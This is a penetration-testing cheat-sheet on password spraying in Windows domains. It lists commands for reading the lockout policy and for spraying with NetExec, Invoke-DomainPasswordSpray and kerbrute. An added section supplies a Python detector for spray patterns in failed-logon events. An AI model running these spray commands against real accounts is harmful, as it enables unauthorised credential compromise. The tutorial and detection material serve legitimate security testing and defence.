Password Spray
Accounts can be locked during the process. Always check the password policy before starting the attack.
Password Policy
Checking the password policy is important for creating a suitable wordlist. Also look for the lockout threshold in order to avoid account lockouts during the brute-force.
Retrieve the password policy:
net accounts
Using NetExec:
nxc smb <ip_address> -u <username> -p <pass> --pass-pol
PowerShell Script
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
Kerbrute
If valid usernames are known, perform a password spray to find weak passwords:
kerbrute passwordspray <username_list> <password> -d <domain_name> --dc <dc_ip>

NXC
Another method to spray passwords, particularly targeting various services:
nxc <service> <target> -u <username_list> -p <password> --continue-on-success
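Detection
A spray that stays below the lockout threshold never trips the per-account counter, so the signal on the defending side is a single source failing against many distinct accounts in a short time. The following is an added example (not part of the original page) that flags that pattern over constructed failed-logon (Event ID 4625) and Kerberos pre-authentication failure (Event ID 4771) records; the thresholds, addresses and account names are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs): (time, event ID, source IP, target account).
# 4625 = failed logon, 4771 = Kerberos pre-authentication failed.
SAMPLE_EVENTS = [
    ("2024-01-10T09:00:01", 4771, "10.0.0.50", "alice"),
    ("2024-01-10T09:00:02", 4771, "10.0.0.50", "bob"),
    ("2024-01-10T09:00:03", 4771, "10.0.0.50", "carol"),
    ("2024-01-10T09:00:04", 4771, "10.0.0.50", "dave"),
    ("2024-01-10T09:00:05", 4771, "10.0.0.50", "erin"),
    ("2024-01-10T09:10:00", 4625, "10.0.0.77", "frank"),  # one user mistyping
    ("2024-01-10T09:10:20", 4625, "10.0.0.77", "frank"),
    ("2024-01-10T09:10:40", 4625, "10.0.0.77", "frank"),
    ("2024-01-10T11:00:00", 4625, "10.0.0.90", "alice"),  # slow failures: only
    ("2024-01-10T13:00:00", 4625, "10.0.0.90", "bob"),    # seen with a wider window
]
FAILURE_EVENT_IDS = {4625, 4771}


def detect_spray(events, min_users=5, window=timedelta(minutes=10)):
    """Return {source_ip: sorted accounts} for sources that fail against
    at least `min_users` distinct accounts inside one sliding window.
    `min_users` and `window` are assumed defaults; tune them per environment."""
    by_source = defaultdict(list)
    for ts, event_id, src, user in events:
        if event_id in FAILURE_EVENT_IDS:
            by_source[src].append((datetime.fromisoformat(ts), user.lower()))

    alerts = {}
    for src, failures in by_source.items():
        failures.sort()
        start = 0
        for end in range(len(failures)):
            # Advance the left edge until the span fits inside `window`.
            while failures[end][0] - failures[start][0] > window:
                start += 1
            users = {u for _, u in failures[start:end + 1]}
            if len(users) >= min_users:
                alerts[src] = sorted(users)
                break
    return alerts


if __name__ == "__main__":
    for src, users in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible spray from {src}: {len(users)} accounts -> {users}")
```

Repeated failures against one account (10.0.0.77 in the sample) are left to the lockout policy itself; this check only counts distinct accounts per source.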
